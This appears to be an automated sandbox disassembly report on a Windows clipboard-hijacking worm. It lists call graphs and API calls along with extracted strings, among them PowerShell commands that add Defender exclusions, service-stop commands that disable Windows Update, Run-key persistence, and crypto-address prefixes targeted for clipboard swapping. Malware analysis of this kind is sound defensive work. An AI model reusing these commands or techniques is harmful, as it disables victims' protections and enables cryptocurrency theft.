40bbe7 LeaveCriticalSection 5743->5744 5745 40bbcf 5743->5745 5744->5726 5746 40c870 3 API calls 5745->5746 5747 40bbda 5746->5747 5747->5744 5749 40be30 13 API calls 5748->5749 5750 40bf11 5749->5750 5750->5726 5752 401339 5751->5752 5759 40139b 5751->5759 5753 401341 SetEvent WaitForSingleObject CloseHandle 5752->5753 5752->5759 5755 401369 5753->5755 5760 40138b 5753->5760 5756 40ab60 GetCurrentProcessId HeapValidate HeapFree __aligned_recalloc_base 5755->5756 5755->5760 5756->5755 5757 401395 5758 40ab60 __aligned_recalloc_base 3 API calls 5757->5758 5758->5759 5759->5730 5761 40b4f0 shutdown closesocket 5760->5761 5761->5757 5762 40d9d0 5763 40d9e6 5762->5763 5767 40da3e 5762->5767 5764 40d9f0 5763->5764 5765 40da43 5763->5765 5766 40da93 5763->5766 5763->5767 5768 40a740 7 API calls 5764->5768 5770 40da68 5765->5770 5771 40da5b InterlockedDecrement 5765->5771 5796 40c570 5766->5796 5772 40d9fd 5768->5772 5773 40ab60 __aligned_recalloc_base 3 API calls 5770->5773 5771->5770 5785 4023d0 5772->5785 5775 40da74 5773->5775 5776 40ab60 __aligned_recalloc_base 3 API calls 5775->5776 5776->5767 5780 40da2b InterlockedIncrement 5780->5767 5782 40daf1 IsBadReadPtr 5783 40dab9 5782->5783 5783->5767 5783->5782 5784 40bf20 195 API calls 5783->5784 5801 40c670 5783->5801 5784->5783 5786 402413 5785->5786 5787 4023d9 5785->5787 5789 40b6f0 5786->5789 5787->5786 5788 4023ea InterlockedIncrement 5787->5788 5788->5786 5790 40b780 2 API calls 5789->5790 5791 40b6ff 5790->5791 5792 40b70d EnterCriticalSection 5791->5792 5793 40b709 5791->5793 5794 40b72c LeaveCriticalSection 5792->5794 5793->5767 5793->5780 5794->5793 5797 40c583 5796->5797 5798 40c5ad memcpy 5796->5798 5799 40a990 9 API calls 5797->5799 5798->5783 5800 40c5a4 5799->5800 5800->5798 5802 40c699 5801->5802 5803 40c68e 5801->5803 5802->5803 5804 40c6b1 memmove 5802->5804 5803->5783 5804->5803 5967 40f910 5968 40f92e 5967->5968 5970 40f9c4 5967->5970 5969 40fb45 NtQueryVirtualMemory 5968->5969 5972 40f949 5969->5972 
5971 40fa30 RtlUnwind 5971->5972 5972->5970 5972->5971 5973 40d510 5974 40b6f0 4 API calls 5973->5974 5975 40d523 5974->5975 5976 40d53a 5975->5976 5978 40d550 InterlockedExchangeAdd 5975->5978 5979 40d56d 5978->5979 5989 40d566 5978->5989 5995 40d840 5979->5995 5982 40d58d InterlockedIncrement 5992 40d597 5982->5992 5983 40bed0 13 API calls 5983->5992 5984 40d5c0 6002 40b3d0 inet_ntoa 5984->6002 5986 40d5cc 5987 40d690 InterlockedDecrement 5986->5987 6003 40b4f0 shutdown closesocket 5987->6003 5989->5976 5990 40a950 __aligned_recalloc_base 7 API calls 5990->5992 5991 40d770 6 API calls 5991->5992 5992->5983 5992->5984 5992->5987 5992->5990 5992->5991 5993 40bf20 195 API calls 5992->5993 5994 40ab60 __aligned_recalloc_base 3 API calls 5992->5994 5993->5992 5994->5992 5996 40d84d socket 5995->5996 5997 40d862 htons connect 5996->5997 5998 40d8bf 5996->5998 5997->5998 5999 40d8aa 5997->5999 5998->5996 6000 40d57d 5998->6000 6004 40b4f0 shutdown closesocket 5999->6004 6000->5982 6000->5989 6002->5986 6003->5989 6004->6000 6005 401920 GetTickCount WaitForSingleObject 6006 401ac9 6005->6006 6007 40194d WSAWaitForMultipleEvents 6005->6007 6008 4019f0 GetTickCount 6007->6008 6009 40196a WSAEnumNetworkEvents 6007->6009 6010 401a43 GetTickCount 6008->6010 6011 401a05 EnterCriticalSection 6008->6011 6009->6008 6025 401983 6009->6025 6014 401ab5 WaitForSingleObject 6010->6014 6015 401a4e EnterCriticalSection 6010->6015 6012 401a16 6011->6012 6013 401a3a LeaveCriticalSection 6011->6013 6019 401a29 LeaveCriticalSection 6012->6019 6047 401820 6012->6047 6013->6014 6014->6006 6014->6007 6017 401aa1 LeaveCriticalSection GetTickCount 6015->6017 6018 401a5f InterlockedExchangeAdd 6015->6018 6016 401992 accept 6016->6008 6016->6025 6017->6014 6065 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 6018->6065 6019->6014 6023 401a72 6023->6017 6023->6018 6066 40b4f0 shutdown closesocket 6023->6066 6025->6008 6025->6016 6026 401cf0 7 API calls 6025->6026 6027 4022c0 6025->6027 
6026->6008 6028 4022d2 EnterCriticalSection 6027->6028 6029 4022cd 6027->6029 6030 4022e7 6028->6030 6031 4022fd LeaveCriticalSection 6028->6031 6029->6025 6030->6031 6032 402308 6031->6032 6033 40230f 6031->6033 6032->6025 6034 40a740 7 API calls 6033->6034 6035 402319 6034->6035 6036 402326 getpeername CreateIoCompletionPort 6035->6036 6037 4023b8 6035->6037 6038 4023b2 6036->6038 6039 402366 6036->6039 6069 40b4f0 shutdown closesocket 6037->6069 6042 40ab60 __aligned_recalloc_base 3 API calls 6038->6042 6067 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 6039->6067 6042->6037 6043 4023c3 6043->6025 6044 40236b InterlockedExchange InitializeCriticalSection InterlockedIncrement 6068 4021e0 EnterCriticalSection LeaveCriticalSection 6044->6068 6046 4023ab 6046->6025 6048 40190f 6047->6048 6049 401830 6047->6049 6048->6013 6049->6048 6050 40183d InterlockedExchangeAdd 6049->6050 6050->6048 6056 401854 6050->6056 6051 401880 6052 401891 6051->6052 6079 40b4f0 shutdown closesocket 6051->6079 6055 4018a7 InterlockedDecrement 6052->6055 6057 401901 6052->6057 6055->6057 6056->6048 6056->6051 6070 4017a0 EnterCriticalSection 6056->6070 6058 402247 6057->6058 6059 402265 EnterCriticalSection 6057->6059 6058->6013 6060 40229c LeaveCriticalSection DeleteCriticalSection 6059->6060 6063 40227d 6059->6063 6061 40ab60 __aligned_recalloc_base 3 API calls 6060->6061 6061->6058 6062 40ab60 GetCurrentProcessId HeapValidate HeapFree __aligned_recalloc_base 6062->6063 6063->6062 6064 40229b 6063->6064 6064->6060 6065->6023 6066->6023 6067->6044 6068->6046 6069->6043 6071 401807 LeaveCriticalSection 6070->6071 6072 4017ba InterlockedExchangeAdd 6070->6072 6071->6056 6073 4017ca LeaveCriticalSection 6072->6073 6074 4017d9 6072->6074 6073->6056 6075 40ab60 __aligned_recalloc_base 3 API calls 6074->6075 6076 4017fe 6075->6076 6077 40ab60 __aligned_recalloc_base 3 API calls 6076->6077 6078 401804 6077->6078 6078->6071 6079->6052 6080 40dfa0 6083 401200 6080->6083 6082 40dfc2 6084 
40121d 6083->6084 6097 401314 6083->6097 6085 40a950 __aligned_recalloc_base 7 API calls 6084->6085 6084->6097 6086 401247 memcpy htons 6085->6086 6087 4012ed 6086->6087 6088 401297 sendto 6086->6088 6089 40ab60 __aligned_recalloc_base 3 API calls 6087->6089 6090 4012b6 InterlockedExchangeAdd 6088->6090 6091 4012e9 6088->6091 6092 4012fc 6089->6092 6090->6088 6093 4012cc 6090->6093 6091->6087 6094 40130a 6091->6094 6092->6082 6096 40ab60 __aligned_recalloc_base 3 API calls 6093->6096 6095 40ab60 __aligned_recalloc_base 3 API calls 6094->6095 6095->6097 6098 4012db 6096->6098 6097->6082 6098->6082 6099 40eba1 6100 40ebaa 6099->6100 6101 40ec9d 6100->6101 6102 40ec13 lstrcmpiW 6100->6102 6103 40ec93 SysFreeString 6102->6103 6104 40ec26 6102->6104 6103->6101 6105 40e990 2 API calls 6104->6105 6107 40ec34 6105->6107 6106 40ec85 6106->6103 6107->6103 6107->6106 6108 40ec63 lstrcmpiW 6107->6108 6109 40ec75 6108->6109 6110 40ec7b SysFreeString 6108->6110 6109->6110 6110->6106 5805 406de4 5814 406d8a 5805->5814 5806 406dba lstrcmpiW 5806->5814 5807 406f35 FindNextFileW 5808 406f51 FindClose 5807->5808 5809 406d5e lstrcmpW 5807->5809 5811 406f5e 5808->5811 5813 406d74 lstrcmpW 5809->5813 5809->5814 5810 406e21 PathMatchSpecW 5812 406e42 wsprintfW SetFileAttributesW DeleteFileW 5810->5812 5810->5814 5812->5814 5813->5814 5814->5806 5814->5807 5814->5810 5815 406e9f PathFileExistsW 5814->5815 5818 4067a0 11 API calls 5814->5818 5815->5814 5816 406eb5 wsprintfW wsprintfW 5815->5816 5816->5814 5817 406f1f MoveFileExW 5816->5817 5817->5807 5818->5814 6111 40792a ExitThread 5819 40e070 5825 401470 5819->5825 5821 40e084 5822 40e0af 5821->5822 5823 40e095 WaitForSingleObject 5821->5823 5824 401330 8 API calls 5823->5824 5824->5822 5826 401483 5825->5826 5827 401572 5825->5827 5826->5827 5828 40a740 7 API calls 5826->5828 5827->5821 5829 401498 CreateEventA socket 5828->5829 5830 4014cf 5829->5830 5833 4014d5 5829->5833 5831 401330 8 API calls 5830->5831 5831->5833 5832 4014e2 
htons setsockopt bind 5834 401546 5832->5834 5835 401558 CreateThread 5832->5835 5833->5827 5833->5832 5836 401330 8 API calls 5834->5836 5835->5827 5838 401100 5835->5838 5837 40154c 5836->5837 5837->5821 5839 401115 ioctlsocket 5838->5839 5840 4011e4 5839->5840 5842 40113a 5839->5842 5841 40ab60 __aligned_recalloc_base 3 API calls 5840->5841 5844 4011ea 5841->5844 5843 4011cd WaitForSingleObject 5842->5843 5845 40a990 9 API calls 5842->5845 5846 401168 recvfrom 5842->5846 5847 4011ad InterlockedExchangeAdd 5842->5847 5843->5839 5843->5840 5845->5842 5846->5842 5846->5843 5849 401000 5847->5849 5850 401014 5849->5850 5851 40103b 5850->5851 5853 40a740 7 API calls 5850->5853 5860 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 5851->5860 5853->5851 5854 40105b 5861 401580 5854->5861 5856 4010ec 5856->5842 5857 4010a3 IsBadReadPtr 5859 401071 5857->5859 5858 4010d8 memmove 5858->5859 5859->5856 5859->5857 5859->5858 5860->5854 5862 401592 5861->5862 5863 4015a5 memcpy 5861->5863 5865 40a990 9 API calls 5862->5865 5864 4015c1 5863->5864 5864->5859 5866 40159f 5865->5866 5866->5863 6112 40d6b0 6117 40d710 6112->6117 6114 40d6de 6116 40d710 send 6116->6114 6118 40d721 send 6117->6118 6119 40d6c3 6118->6119 6120 40d73e 6118->6120 6119->6114 6119->6116 6120->6118 6120->6119 6121 40d930 6122 40d934 6121->6122 6123 40bbb0 5 API calls 6122->6123 6124 40d950 WaitForSingleObject 6122->6124 6125 40d550 209 API calls 6122->6125 6126 40d975 6122->6126 6123->6122 6124->6122 6124->6126 6125->6122 6127 4059b0 GetWindowLongW 6128 4059d4 6127->6128 6129 4059f6 6127->6129 6130 4059e1 6128->6130 6131 405a67 IsClipboardFormatAvailable 6128->6131 6137 405a46 6129->6137 6138 405a2e SetWindowLongW 6129->6138 6146 4059f1 6129->6146 6134 405a04 SetClipboardViewer SetWindowLongW 6130->6134 6135 4059e7 6130->6135 6132 405a83 IsClipboardFormatAvailable 6131->6132 6133 405a7a 6131->6133 6132->6133 6139 405a98 IsClipboardFormatAvailable 6132->6139 6142 405ab5 OpenClipboard 6133->6142 6161 
405b7c 6133->6161 6136 405be4 DefWindowProcA 6134->6136 6140 405b9d RegisterRawInputDevices ChangeClipboardChain 6135->6140 6135->6146 6141 405a4c SendMessageA 6137->6141 6137->6146 6138->6146 6139->6133 6140->6136 6141->6146 6143 405ac5 GetClipboardData 6142->6143 6142->6161 6145 405add GlobalLock 6143->6145 6143->6146 6144 405b85 SendMessageA 6144->6146 6145->6146 6147 405af5 6145->6147 6146->6136 6148 405b08 6147->6148 6149 405b29 6147->6149 6151 405b3e 6148->6151 6152 405b0e 6148->6152 6150 40d250 13 API calls 6149->6150 6153 405b14 GlobalUnlock CloseClipboard 6150->6153 6168 4057f0 6151->6168 6152->6153 6162 405680 6152->6162 6157 405b67 6153->6157 6153->6161 6176 404970 lstrlenW 6157->6176 6160 40ab60 __aligned_recalloc_base 3 API calls 6160->6161 6161->6144 6161->6146 6164 40568b 6162->6164 6163 405691 lstrlenW 6163->6164 6165 4056a4 6163->6165 6164->6163 6164->6165 6166 40a950 __aligned_recalloc_base 7 API calls 6164->6166 6167 4056c1 lstrcpynW 6164->6167 6165->6153 6166->6164 6167->6164 6167->6165 6173 4057fd 6168->6173 6169 405803 lstrlenA 6169->6173 6174 405816 6169->6174 6170 405740 2 API calls 6170->6173 6171 40a950 __aligned_recalloc_base 7 API calls 6171->6173 6173->6169 6173->6170 6173->6171 6173->6174 6175 40ab60 __aligned_recalloc_base 3 API calls 6173->6175 6210 4057a0 6173->6210 6174->6153 6175->6173 6184 4049a4 6176->6184 6177 404bfd 6177->6160 6178 404e81 StrStrW 6180 404e94 6178->6180 6181 404e98 StrStrW 6178->6181 6179 404c0f 6179->6177 6179->6178 6180->6181 6182 404eab 6181->6182 6183 404eaf StrStrW 6181->6183 6182->6183 6185 404ec2 6183->6185 6184->6177 6184->6179 6187 404d90 StrStrW 6184->6187 6197 404ed8 6185->6197 6215 4048a0 lstrlenW 6185->6215 6187->6179 6188 404dbb StrStrW 6187->6188 6188->6179 6189 404de6 StrStrW 6188->6189 6189->6179 6190 4054aa StrStrW 6194 4054c4 StrStrW 6190->6194 6195 4054bd 6190->6195 6191 40544f StrStrW 6192 405462 6191->6192 6193 40546b StrStrW 6191->6193 6192->6190 6193->6192 6196 405487 StrStrW 6193->6196 
6198 4054d7 6194->6198 6199 4054de StrStrW 6194->6199 6195->6194 6196->6192 6197->6177 6197->6190 6197->6191 6198->6199 6200 4054f1 6199->6200 6201 4054f8 StrStrW 6199->6201 6200->6201 6202 405512 StrStrW 6201->6202 6203 40550b 6201->6203 6204 405525 lstrlenA 6202->6204 6203->6202 6204->6177 6206 4055ff GlobalAlloc 6204->6206 6206->6177 6207 40561a GlobalLock 6206->6207 6207->6177 6208 40562d memcpy GlobalUnlock OpenClipboard 6207->6208 6208->6177 6209 40565a EmptyClipboard SetClipboardData CloseClipboard 6208->6209 6209->6177 6211 4057ab 6210->6211 6212 4057b1 lstrlenA 6211->6212 6213 405740 2 API calls 6211->6213 6214 4057e4 6211->6214 6212->6211 6213->6211 6214->6173 6218 4048c4 6215->6218 6216 404911 iswalpha 6216->6218 6219 40492c iswdigit 6216->6219 6217 40490d 6217->6197 6218->6216 6218->6217 6218->6219 6219->6218 5867 4084f9 5868 408502 5867->5868 5869 408511 34 API calls 5868->5869 5870 409346 5868->5870 6220 405fbd 6222 405f51 6220->6222 6221 40ab60 __aligned_recalloc_base 3 API calls 6223 405fc8 LeaveCriticalSection 6221->6223 6224 405fa6 memcpy 6222->6224 6225 405fbb 6222->6225 6224->6225 6225->6221 6227 40ac3e 6228 40ab60 __aligned_recalloc_base 3 API calls 6227->6228 6231 40abfd 6228->6231 6229 40ac12 6230 40a950 __aligned_recalloc_base 7 API calls 6230->6231 6231->6229 6231->6230 6232 40ac14 memcpy 6231->6232 6232->6231

Control-flow Graph

control_flow_graph 88 40f1b0-40f1dc GetLocaleInfoA strcmp 89 40f1e2 88->89 90 40f1de-40f1e0 88->90 91 40f1e4-40f1e7 89->91 90->91
APIs
• GetLocaleInfoA.KERNELBASE(00000400,00000007,?,0000000A,?,?,00407A28), ref: 0040F1C3
• strcmp.NTDLL ref: 0040F1D2
Strings
Memory Dump Source
• Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_33080.jbxd
Yara matches
Similarity
• API ID: InfoLocalestrcmp
• String ID: UKR
• API String ID: 3191669094-64918367
• Opcode ID: 8e44c828f7342be6b1b961f5fa6f40dd4523076a999cbca5f949ecc83b5425ee
• Instruction ID: 1be06a77ef1098bc08a48f46d8927727b75ba0885e831d13d66ebc3380d14d50
• Opcode Fuzzy Hash: 8e44c828f7342be6b1b961f5fa6f40dd4523076a999cbca5f949ecc83b5425ee
• Instruction Fuzzy Hash: FDE01276E44308B6DA20A6A0AD02BE6776C6715705F0001B6BE08AA5C1E9B9961DC7EA

Control-flow Graph

control_flow_graph 0 407940-407974 Sleep CreateMutexA GetLastError 1 407976-407978 ExitProcess 0->1 2 40797e-407a1d GetModuleFileNameW PathFindFileNameW wsprintfW DeleteFileW ExpandEnvironmentStringsW wcscmp 0->2 3 407d31-407d9d Sleep ShellExecuteW * 2 RegOpenKeyExW 2->3 4 407a23-407a2e call 40f1b0 2->4 5 407dcb-407df6 RegOpenKeyExW 3->5 6 407d9f-407dc5 RegSetValueExW RegCloseKey 3->6 13 407a30-407a32 ExitProcess 4->13 14 407a38-407a86 ExpandEnvironmentStringsW wsprintfW CopyFileW 4->14 8 407e24-407e4f RegOpenKeyExW 5->8 9 407df8-407e1e RegSetValueExW RegCloseKey 5->9 6->5 11 407e51-407e77 RegSetValueExW RegCloseKey 8->11 12 407e7d-407ea8 RegOpenKeyExW 8->12 9->8 11->12 17 407ed6-407f01 RegOpenKeyExW 12->17 18 407eaa-407ed0 RegSetValueExW RegCloseKey 12->18 15 407b36-407b78 Sleep wsprintfW CopyFileW 14->15 16 407a8c-407ac6 SetFileAttributesW RegOpenKeyExW 14->16 22 407c28-407c81 Sleep ExpandEnvironmentStringsW wsprintfW CopyFileW 15->22 23 407b7e-407bb8 SetFileAttributesW RegOpenKeyExW 15->23 16->15 21 407ac8-407afb wcslen RegSetValueExW 16->21 19 407f03-407f29 RegSetValueExW RegCloseKey 17->19 20 407f2f-407f5a RegOpenKeyExW 17->20 18->17 19->20 25 407f88-407fb3 RegOpenKeyExW 20->25 26 407f5c-407f82 RegSetValueExW RegCloseKey 20->26 27 407b29-407b30 RegCloseKey 21->27 28 407afd-407b1f RegCloseKey call 40f400 21->28 22->3 24 407c87-407cc1 SetFileAttributesW RegOpenKeyExW 22->24 23->22 29 407bba-407bed wcslen RegSetValueExW 23->29 24->3 30 407cc3-407cf6 wcslen RegSetValueExW 24->30 32 407fb5-408019 RegSetValueExW * 3 RegCloseKey 25->32 33 40801f-40804a RegOpenKeyExW 25->33 26->25 27->15 28->27 43 407b21-407b23 ExitProcess 28->43 34 407c1b-407c22 RegCloseKey 29->34 35 407bef-407c11 RegCloseKey call 40f400 29->35 36 407d24-407d2b RegCloseKey 30->36 37 407cf8-407d1a RegCloseKey call 40f400 30->37 32->33 39 408050-4080d3 RegSetValueExW * 4 RegCloseKey 33->39 40 4080d9-408104 RegOpenKeyExW 33->40 34->22 35->34 50 407c13-407c15 ExitProcess 35->50 36->3 37->36 51 407d1c-407d1e ExitProcess 37->51 39->40 44 4081f0-40821b RegOpenKeyExW 40->44 45 40810a-4081ea RegSetValueExW * 7 RegCloseKey 40->45 48 408221-408301 RegSetValueExW * 7 RegCloseKey 44->48 49 408307-40831c Sleep call 40d180 44->49 45->44 48->49 54 408491-40849a 49->54 55 408322-40848e WSAStartup wsprintfW * 2 CreateThread Sleep CreateThread Sleep CreateThread Sleep call 405c00 call 40e0c0 call 407390 CreateEventA call 40c8b0 call 40dbb0 call 40bc70 call 40dbe0 * 4 call 40dd50 call 40de90 49->55 55->54
APIs
• Sleep.KERNELBASE(000007D0), ref: 0040794E
• CreateMutexA.KERNELBASE(00000000,00000000,mmn7nnm8na), ref: 0040795D
• GetLastError.KERNEL32 ref: 00407969
• ExitProcess.KERNEL32 ref: 00407978
• GetModuleFileNameW.KERNEL32(00000000,004161D0,00000105), ref: 004079B2
• PathFindFileNameW.SHLWAPI(004161D0), ref: 004079BD
• wsprintfW.USER32 ref: 004079DA
• DeleteFileW.KERNELBASE(?), ref: 004079EA
• ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 00407A01
• wcscmp.NTDLL ref: 00407A13
• ExitProcess.KERNEL32 ref: 00407A32
Strings
Memory Dump Source
• Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_33080.jbxd
Yara matches
Similarity
• API ID: File$ExitNameProcess$CreateDeleteEnvironmentErrorExpandFindLastModuleMutexPathSleepStringswcscmpwsprintf
• String ID: %s:Zone.Identifier$%s\%s$%s\%s$%s\%s$%s\tbtcmds.dat$%s\tbtnds.dat$%temp%$%userprofile%$%windir%$/c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -$/c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait$AlwaysAutoUpdate$AntiSpywareOverride$AntiSpywareOverride$AntiVirusDisableNotify$AntiVirusDisableNotify$AntiVirusOverride$AntiVirusOverride$AutoUpdateOptions$DisableWindowsUpdate$DisableWindowsUpdate$EnableWindowsUpdate$FirewallDisableNotify$FirewallDisableNotify$FirewallOverride$FirewallOverride$NoAutoUpdate$OverrideNotice$PreventDownload$SOFTWARE\Microsoft\Security Center$SOFTWARE\Microsoft\Security Center\Svc$SOFTWARE\Policies\Microsoft\Windows\UpdateOrchestrator$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU$SYSTEM\CurrentControlSet\Services\BITS$SYSTEM\CurrentControlSet\Services\DoSvc$SYSTEM\CurrentControlSet\Services\UsoSvc$SYSTEM\CurrentControlSet\Services\WaaSMedicSvc$SYSTEM\CurrentControlSet\Services\wuauserv$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Start$Start$Start$Start$Start$UpdatesDisableNotify$UpdatesDisableNotify$UpdatesOverride$UpdatesOverride$Windows Settings$cmd.exe$cmd.exe$mmn7nnm8na$open$open$sysppvrdnvs.exe
• API String ID: 4172876685-159212852
• Opcode ID: 14d5bbea81be467e13e3765130848305c9d0a11b32ad18c98a91a2c8bc0bfa95
• Instruction ID: 367eef7d7cdc4f6bbf58631969cb55eb0d30a7b17f9c19f9a6cac2e90da0940f
• Opcode Fuzzy Hash: 14d5bbea81be467e13e3765130848305c9d0a11b32ad18c98a91a2c8bc0bfa95
• Instruction Fuzzy Hash: 245240B1A80318BBE7209BA0DC4AFD97775AB48B15F1081A5B309B61D0D7F5AAC4CF5C

Control-flow Graph

                                                                                                                                    control_flow_graph 82 40f400-40f460 memset * 2 CreateProcessW 83 40f471-40f495 ShellExecuteW 82->83 84 40f462-40f46f Sleep 82->84 86 40f4a6 83->86 87 40f497-40f4a4 Sleep 83->87 85 40f4a8-40f4ab 84->85 86->85 87->85
                                                                                                                                    APIs
                                                                                                                                    • memset.NTDLL ref: 0040F40E
                                                                                                                                    • memset.NTDLL ref: 0040F41E
                                                                                                                                    • CreateProcessW.KERNELBASE(00000000,00407D11,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 0040F457
                                                                                                                                    • Sleep.KERNELBASE(000003E8), ref: 0040F467
                                                                                                                                    • ShellExecuteW.SHELL32(00000000,open,00407D11,00000000,00000000,00000000), ref: 0040F482
                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 0040F49C
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Sleepmemset$CreateExecuteProcessShell
                                                                                                                                    • String ID: $D$open
                                                                                                                                    • API String ID: 3787208655-2182757814
                                                                                                                                    • Opcode ID: 86490e0f5312193f556b58b4939b15177e1386a4ac5e4b01298813237b5ed1b8
                                                                                                                                    • Instruction ID: 03d024a0b9a73c413bf1553ab10d0ee3a8ab15297eec0ef6a9417e1ec1830951
                                                                                                                                    • Opcode Fuzzy Hash: 86490e0f5312193f556b58b4939b15177e1386a4ac5e4b01298813237b5ed1b8
                                                                                                                                    • Instruction Fuzzy Hash: ED112B71A80308BAEB209B90CD46FDE7778AB14B10F204135FA047E2C0D6B9AA448759

                                                                                                                                    Control-flow Graph

                                                                                                                                    [Control-flow graph image of the function at 4068e0-406f67 (wsprintfW, PathFileExistsW, CopyFileW, DeleteFileW, FindFirstFileW/FindNextFileW, MoveFileExW); legend: Executed / Not Executed]
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$wsprintf$ExistsPath$AttributesDelete$CreateDirectory_chkstk
                                                                                                                                    • String ID: %s.lnk$%s\%s$%s\%s$%s\%s$%s\%s$%s\%s\%s$%s\%s\rvlcfg.exe$%s\%s\rvldrv.exe$%s\*$shell32.dll$shell32.dll$shell32.dll$shell32.dll
                                                                                                                                    • API String ID: 495142193-638321828
                                                                                                                                    • Opcode ID: bba10b6da6457b63d7fe7870a3bcf93d38d67b95bd357d565e7f9915594a4b88
                                                                                                                                    • Instruction ID: 1e7642a3bb229a683b77cec8f60a4b6186945a0df842d4041ba496de3fd539ef
                                                                                                                                    • Opcode Fuzzy Hash: bba10b6da6457b63d7fe7870a3bcf93d38d67b95bd357d565e7f9915594a4b88
                                                                                                                                    • Instruction Fuzzy Hash: 500270B5900218EBDB20DB60DC44FEA7778BF44705F0485EAF50AA6190DBB89BD4CF69
                                                                                                                                    APIs
                                                                                                                                    • lstrlenW.KERNEL32(00000000), ref: 0040498C
                                                                                                                                    • StrStrW.SHLWAPI(00000000,bitcoincash:), ref: 00404D99
                                                                                                                                    • StrStrW.SHLWAPI(00000000,cosmos), ref: 00404DC4
                                                                                                                                    • StrStrW.SHLWAPI(00000000,addr), ref: 00404DEF
                                                                                                                                    • StrStrW.SHLWAPI(00000000,bitcoincash:), ref: 00404E8A
                                                                                                                                    • StrStrW.SHLWAPI(00000000,ronin:), ref: 00404EA1
                                                                                                                                    • StrStrW.SHLWAPI(00000000,nano_), ref: 00404EB8
                                                                                                                                    • StrStrW.SHLWAPI(00000000,bnb), ref: 00405458
                                                                                                                                    • StrStrW.SHLWAPI(00000000,bc1p), ref: 00405474
                                                                                                                                    • StrStrW.SHLWAPI(00000000,bc1q), ref: 00405490
                                                                                                                                    • StrStrW.SHLWAPI(00000000,ronin:), ref: 004054B3
                                                                                                                                    • StrStrW.SHLWAPI(00000000,bitcoincash:), ref: 004054CD
                                                                                                                                    • StrStrW.SHLWAPI(00000000,cosmos), ref: 004054E7
                                                                                                                                    • StrStrW.SHLWAPI(00000000,addr), ref: 00405501
                                                                                                                                    • StrStrW.SHLWAPI(00000000,nano_), ref: 0040551B
                                                                                                                                    • lstrlenA.KERNEL32(00000000), ref: 004055F0
                                                                                                                                    • GlobalAlloc.KERNEL32(00002002,-00000001), ref: 0040560B
                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 0040561E
                                                                                                                                    • memcpy.NTDLL(00000000,00000000,-00000001), ref: 0040563C
                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00405648
                                                                                                                                    • OpenClipboard.USER32(00000000), ref: 00405650
                                                                                                                                    • EmptyClipboard.USER32 ref: 0040565A
                                                                                                                                    • SetClipboardData.USER32(00000001,00000000), ref: 00405666
                                                                                                                                    • CloseClipboard.USER32 ref: 0040566C
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Clipboard$Global$lstrlen$AllocCloseDataEmptyLockOpenUnlockmemcpy
